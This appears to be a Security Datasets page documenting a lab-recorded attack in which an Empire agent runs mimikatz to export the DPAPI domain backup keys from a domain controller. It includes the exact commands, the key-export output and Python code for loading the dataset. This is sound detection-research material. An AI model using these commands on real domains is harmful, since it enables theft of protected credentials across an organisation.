Empire Mimikatz Backup Keys

Metadata

Contributors

Roberto Rodriguez @Cyb3rWard0g

Creation Date

2019/05/18

Modification Date

2020/09/21

Tactics

TA0006

Techniques

T1003

Tags

DPAPI,DPAPI Domain Backup key,RPC LSARPC

Dataset Description

This dataset represents adversaries retrieving the DPAPI Domain Backup Key from the DC via RPC LSARPC methods over SMB.

Simulation Metadata

Tools

type

Name

Module

C2

Empire

mimikatz_lsadump_backupkeys

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
ALYH6ZB2 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         4380   5/0.0    2020-10-22 18:24:28  http            

(Empire: agents) > interact ALYH6ZB2
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/
cache*           command          dcsync_hashdump  golden_ticket    logonpasswords*  mimitokens*      purge            silver_ticket    
certs*           dcsync           extract_tickets  keys*            lsadump*         pth*             sam*             trust_keys*      
(Empire: ALYH6ZB2) > usemodule credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > set Command lsadump::backupkeys /system:MORDORDC.theshire.local /export
(Empire: powershell/credentials/mimikatz/command) > execute
[*] Tasked ALYH6ZB2 to run TASK_CMD_JOB
[*] Agent ALYH6ZB2 tasked with task ID 1
[*] Tasked agent ALYH6ZB2 to run module powershell/credentials/mimikatz/command
(Empire: powershell/credentials/mimikatz/command) > 
Job started: 75WB4S

Hostname: WORKSTATION5.theshire.local / S-1-5-21-2323213074-4052461197-1785501644

  .#####.   mimikatz 2.2.0 (x64) #19041 Oct  4 2020 10:28:51
.## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ##       > https://blog.gentilkiwi.com/mimikatz
'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::backupkeys /system:MORDORDC.theshire.local /export

Current prefered key:       {a0feda20-878f-4e68-ba74-d4df8f0191ab}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   : 
        |Implementation: CRYPT_IMPL_SOFTWARE ; 
        Algorithm      : CALG_RSA_KEYX
        Key size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : YES
        Private export : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.pfx'
        Export         : OK - 'ntds_capi_0_a0feda20-878f-4e68-ba74-d4df8f0191ab.der'

Compatibility prefered key: {0343c16b-26f1-4e2c-83ed-90e443b3bfca}
  * Legacy key
daef8bf857ba653c7c233a1156d0fb3c488487caf7b0cb1879f6f6fd4dc3877d
4ad77077efd018b07267585828f1e3a7e88abd203ca86d820bcd1f1f806426e2
71834ddd67073b1e581379be55a6dd97fecee5ff9cda881936209f35653a681e
444aedb87d2bef790e4b25084c4395372f358e226893731f621eb3f0f99153ab
9af4c25dd32010ffe1bcac8b7ba10c6163d97b85ee19653356624068b8f01476
77cb393bbf0fd4369a8a6982545aa2a81b70132b636218bdb9a7b7f7149d361c
45236e528672ec9defd57430cdc0264ad6d51669715d83be2b059ec162607603
834960f44601d4a2a02d901d67f7046b81adf702b48f8420598dd8e81fe8b1bc

        Export         : OK - 'ntds_legacy_0_0343c16b-26f1-4e2c-83ed-90e443b3bfca.key'
(Empire: powershell/credentials/mimikatz/command) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_backupkeys_dcerpc_smb_lsarpc.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

from pandas.io import json

df = json.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)